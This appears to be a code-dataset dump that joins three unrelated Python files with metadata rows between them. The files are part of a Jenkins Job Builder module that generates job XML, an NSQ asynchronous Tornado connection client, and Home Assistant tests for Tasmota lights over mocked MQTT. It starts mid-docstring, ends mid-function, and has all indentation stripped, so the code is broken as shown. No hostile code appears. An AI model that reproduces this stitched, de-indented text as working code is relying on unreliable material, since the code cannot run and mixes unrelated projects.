That speficies that the job should be run on a Jenkins node or node group
named ``precise``.
"""
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
class General(jenkins_jobs.modules.base.Base):
sequence = 10
def gen_xml(self, parser, xml, data):
jdk = data.get('jdk', None)
if jdk:
XML.SubElement(xml, 'jdk').text = jdk
XML.SubElement(xml, 'actions')
desc_text = data.get('description', None)
if desc_text is not None:
description = XML.SubElement(xml, 'description')
description.text = desc_text
XML.SubElement(xml, 'keepDependencies').text = 'false'
disabled = data.get('disabled', None)
if disabled is not None:
if disabled:
XML.SubElement(xml, 'disabled').text = 'true'
else:
XML.SubElement(xml, 'disabled').text = 'false'
if 'display-name' in data:
XML.SubElement(xml, 'displayName').text = data['display-name']
if data.get('block-downstream'):
XML.SubElement(xml,
'blockBuildWhenDownstreamBuilding').text = 'true'
else:
XML.SubElement(xml,
'blockBuildWhenDownstreamBuilding').text = 'false'
if data.get('block-upstream'):
XML.SubElement(xml,
'blockBuildWhenUpstreamBuilding').text = 'true'
else:
XML.SubElement(xml,
'blockBuildWhenUpstreamBuilding').text = 'false'
if 'auth-token' in data:
XML.SubElement(xml, 'authToken').text = data['auth-token']
if data.get('concurrent'):
XML.SubElement(xml, 'concurrentBuild').text = 'true'
else:
XML.SubElement(xml, 'concurrentBuild').text = 'false'
if 'workspace' in data:
XML.SubElement(xml, 'customWorkspace').text = \
str(data['workspace'])
if 'quiet-period' in data:
XML.SubElement(xml, 'quietPeriod').text = str(data['quiet-period'])
node = data.get('node', None)
if node:
XML.SubElement(xml, 'assignedNode').text = node
XML.SubElement(xml, 'canRoam').text = 'false'
else:
XML.SubElement(xml, 'canRoam').text = 'true'
if 'logrotate' in data:
lr_xml = XML.SubElement(xml, 'logRotator')
logrotate = data['logrotate']
lr_days = XML.SubElement(lr_xml, 'daysToKeep')
lr_days.text = str(logrotate.get('daysToKeep', -1))
lr_num = XML.SubElement(lr_xml, 'numToKeep')
lr_num.text = str(logrotate.get('numToKeep', -1))
lr_adays = XML.SubElement(lr_xml, 'artifactDaysToKeep')
lr_adays.text = str(logrotate.get('artifactDaysToKeep', -1))
lr_anum = XML.SubElement(lr_xml, 'artifactNumToKeep')
lr_anum.text = str(logrotate.get('artifactNumToKeep', -1))
| apache-2.0 | -6,258,473,018,899,836,000 | 36.821429 | 79 | 0.613787 | false | 3.925857 | false | false | false |
davegardnerisme/nsq | pynsq/nsq/async.py | 15 | 3260 | import socket
import struct
import logging
import tornado.iostream
import nsq
class AsyncConn(object):
def __init__(self, host, port, connect_callback, data_callback, close_callback, timeout=1.0):
assert isinstance(host, (str, unicode))
assert isinstance(port, int)
assert callable(connect_callback)
assert callable(data_callback)
assert callable(close_callback)
assert isinstance(timeout, float)
self.connecting = False
self.connected = False
self.host = host
self.port = port
self.connect_callback = connect_callback
self.data_callback = data_callback
self.close_callback = close_callback
self.timeout = timeout
def connect(self):
if self.connected or self.connecting:
return
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.settimeout(self.timeout)
self.s.setblocking(0)
self.stream = tornado.iostream.IOStream(self.s)
self.stream.set_close_callback(self._socket_close)
self.connecting = True
self.stream.connect((self.host, self.port), self._connect_callback)
def _connect_callback(self):
self.connecting = False
self.connected = True
self.stream.write(nsq.MAGIC_V2)
self._start_read()
try:
self.connect_callback(self)
except Exception:
logging.exception("uncaught exception in connect_callback")
def _start_read(self):
self.stream.read_bytes(4, self._read_size)
def _socket_close(self):
self.connected = False
try:
self.close_callback(self)
except Exception:
logging.exception("uncaught exception in close_callback")
def close(self):
self.connected = False
self.stream.close()
def _read_size(self, data):
try:
size = struct.unpack('>l', data)[0]
self.stream.read_bytes(size, self._read_body)
except Exception:
self.close()
logging.exception("failed to unpack size")
def _read_body(self, data):
try:
self.data_callback(self, data)
except Exception:
logging.exception("uncaught exception in data_callback")
tornado.ioloop.IOLoop.instance().add_callback(self._start_read)
def send(self, data):
self.stream.write(data)
def __str__(self):
return self.host + ':' + str(self.port)
if __name__ == '__main__':
def connect_callback(c):
print "connected"
c.send(nsq.subscribe('test', 'ch', 'a', 'b'))
c.send(nsq.ready(1))
def close_callback(c):
print "connection closed"
def data_callback(c, data):
unpacked = nsq.unpack_response(data)
if unpacked[0] == nsq.FRAME_TYPE_MESSAGE:
c.send(nsq.ready(1))
msg = nsq.decode_message(unpacked[1])
print msg.id, msg.body
c.send(nsq.finish(msg.id))
c = AsyncConn("127.0.0.1", 4150, connect_callback, data_callback, close_callback)
c.connect()
tornado.ioloop.IOLoop.instance().start()
| mit | -2,042,503,924,097,074,000 | 29.185185 | 97 | 0.589571 | false | 3.980464 | false | false | false |
soldag/home-assistant | tests/components/tasmota/test_light.py | 2 | 35443 | """The tests for the Tasmota light platform."""
import copy
import json
from hatasmota.const import CONF_MAC
from hatasmota.utils import (
get_topic_stat_result,
get_topic_tele_state,
get_topic_tele_will,
)
from homeassistant.components import light
from homeassistant.components.light import (
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_TRANSITION,
SUPPORT_WHITE_VALUE,
)
from homeassistant.components.tasmota.const import DEFAULT_PREFIX
from homeassistant.const import ATTR_ASSUMED_STATE, STATE_OFF, STATE_ON
from .test_common import (
DEFAULT_CONFIG,
help_test_availability,
help_test_availability_discovery_update,
help_test_availability_poll_state,
help_test_availability_when_connection_lost,
help_test_discovery_device_remove,
help_test_discovery_removal,
help_test_discovery_update_unchanged,
help_test_entity_id_update_discovery_update,
help_test_entity_id_update_subscriptions,
)
from tests.async_mock import patch
from tests.common import async_fire_mqtt_message
from tests.components.light import common
async def test_attributes_on_off(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert state.attributes.get("supported_features") == 0
async def test_attributes_dimmer(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (dimmer)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION
)
async def test_attributes_ct(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 2 # 2 channel light (CW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") == 153
assert state.attributes.get("max_mireds") == 500
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION
)
async def test_attributes_ct_reduced(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 2 # 2 channel light (CW)
config["so"]["82"] = 1 # Reduced CT range
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") == 200
assert state.attributes.get("max_mireds") == 380
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION
)
async def test_attributes_rgb(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 3 # 3 channel light (RGB)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION
)
async def test_attributes_rgbw(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 4 # 5 channel light (RGBW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS
| SUPPORT_COLOR
| SUPPORT_EFFECT
| SUPPORT_TRANSITION
| SUPPORT_WHITE_VALUE
)
async def test_attributes_rgbww(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") == 153
assert state.attributes.get("max_mireds") == 500
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS
| SUPPORT_COLOR
| SUPPORT_COLOR_TEMP
| SUPPORT_EFFECT
| SUPPORT_TRANSITION
| SUPPORT_WHITE_VALUE
)
async def test_attributes_rgbww_reduced(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
config["so"]["82"] = 1 # Reduced CT range
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") == 200
assert state.attributes.get("max_mireds") == 380
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS
| SUPPORT_COLOR
| SUPPORT_COLOR_TEMP
| SUPPORT_EFFECT
| SUPPORT_TRANSITION
| SUPPORT_WHITE_VALUE
)
async def test_controlling_state_via_mqtt_on_off(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert state.state == "unavailable"
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async def test_controlling_state_via_mqtt_ct(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 2 # 2 channel light (CT)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert state.state == "unavailable"
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("brightness") == 127.5
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("color_temp") == 300
# Tasmota will send "Color" also for CT light, this should be ignored
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128"}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("color_temp") == 300
assert state.attributes.get("brightness") == 127.5
async def test_controlling_state_via_mqtt_rgbww(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert state.state == "unavailable"
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("brightness") == 127.5
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128,0"}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("rgb_color") == (255, 128, 0)
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("white_value") == 127.5
# Setting white > 0 should clear the color
assert not state.attributes.get("rgb_color")
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("color_temp") == 300
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":0}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
# Setting white to 0 should clear the white_value and color_temp
assert not state.attributes.get("white_value")
assert not state.attributes.get("color_temp")
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Scheme":3}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("effect") == "Cycle down"
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async def test_sending_mqtt_commands_on_off(hass, mqtt_mock, setup_tasmota):
"""Test the sending MQTT commands."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Power1", "ON", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Tasmota is not optimistic, the state should still be off
state = hass.states.get("light.test")
assert state.state == STATE_OFF
# Turn the light off and verify MQTT message is sent
await common.async_turn_off(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Power1", "OFF", 0, False
)
mqtt_mock.async_publish.reset_mock()
async def test_sending_mqtt_commands_rgbww(hass, mqtt_mock, setup_tasmota):
"""Test the sending MQTT commands."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Tasmota is not optimistic, the state should still be off
state = hass.states.get("light.test")
assert state.state == STATE_OFF
# Turn the light off and verify MQTT message is sent
await common.async_turn_off(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT messages are sent
await common.async_turn_on(hass, "light.test", brightness=192)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Dimmer 75", 0, False
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", rgb_color=[255, 128, 0])
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Color2 255,128,0",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", color_temp=200)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;CT 200",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", white_value=128)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;White 50",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", effect="Random")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Scheme 4",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
async def test_sending_mqtt_commands_power_unlinked(hass, mqtt_mock, setup_tasmota):
"""Test the sending MQTT commands to a light with unlinked dimlevel and power."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (dimmer)
config["so"]["20"] = 1 # Update of Dimmer/Color/CT without turning power on
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Tasmota is not optimistic, the state should still be off
state = hass.states.get("light.test")
assert state.state == STATE_OFF
# Turn the light off and verify MQTT message is sent
await common.async_turn_off(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT messages are sent; POWER should be sent
await common.async_turn_on(hass, "light.test", brightness=192)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Dimmer 75;NoDelay;Power1 ON",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
async def test_transition(hass, mqtt_mock, setup_tasmota):
"""Test transition commands."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Dim the light from 0->100: Speed should be 4*2=8
await common.async_turn_on(hass, "light.test", brightness=255, transition=4)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 1;NoDelay;Speed 8;NoDelay;Dimmer 100",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Dim the light from 0->50: Speed should be 4*2/2=4
await common.async_turn_on(hass, "light.test", brightness=128, transition=4)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 1;NoDelay;Speed 4;NoDelay;Dimmer 50",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Fake state update from the light
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("brightness") == 127.5
# Dim the light from 50->0: Speed should be 6*2/2=6
await common.async_turn_off(hass, "light.test", transition=6)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 1;NoDelay;Speed 6;NoDelay;Power1 OFF",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
async def test_relay_as_light(hass, mqtt_mock, setup_tasmota):
"""Test relay show up as light in light mode."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("switch.test")
assert state is None
state = hass.states.get("light.test")
assert state is not None
async def _test_split_light(hass, mqtt_mock, config, num_lights, num_switches):
"""Test multi-channel light split to single-channel dimmers."""
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
await hass.async_block_till_done()
await hass.async_block_till_done()
assert len(hass.states.async_entity_ids("switch")) == num_switches
assert len(hass.states.async_entity_ids("light")) == num_lights
lights = hass.states.async_entity_ids("light")
for idx, entity in enumerate(lights):
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, entity)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Dim the light and verify MQTT message is sent
await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Channel{idx+num_switches+1} {(idx+1)*10}",
0,
False,
)
async def test_split_light(hass, mqtt_mock, setup_tasmota):
"""Test multi-channel light split to single-channel dimmers."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["rl"][1] = 2
config["rl"][2] = 2
config["rl"][3] = 2
config["rl"][4] = 2
config["so"][68] = 1 # Multi-channel PWM instead of a single light
config["lt_st"] = 5 # 5 channel light (RGBCW)
await _test_split_light(hass, mqtt_mock, config, 5, 0)
async def test_split_light2(hass, mqtt_mock, setup_tasmota):
"""Test multi-channel light split to single-channel dimmers."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["rl"][1] = 1
config["rl"][2] = 2
config["rl"][3] = 2
config["rl"][4] = 2
config["rl"][5] = 2
config["rl"][6] = 2
config["so"][68] = 1 # Multi-channel PWM instead of a single light
config["lt_st"] = 5 # 5 channel light (RGBCW)
await _test_split_light(hass, mqtt_mock, config, 5, 2)
async def _test_unlinked_light(hass, mqtt_mock, config, num_switches):
"""Test rgbww light split to rgb+ww."""
mac = config["mac"]
num_lights = 2
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
await hass.async_block_till_done()
await hass.async_block_till_done()
assert len(hass.states.async_entity_ids("switch")) == num_switches
assert len(hass.states.async_entity_ids("light")) == num_lights
lights = hass.states.async_entity_ids("light")
for idx, entity in enumerate(lights):
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, entity)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Dim the light and verify MQTT message is sent
await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Dimmer{idx+1} {(idx+1)*10}",
0,
False,
)
async def test_unlinked_light(hass, mqtt_mock, setup_tasmota):
"""Test rgbww light split to rgb+ww."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["rl"][1] = 2
config["lk"] = 0 # RGB + white channels unlinked
config["lt_st"] = 5 # 5 channel light (RGBCW)
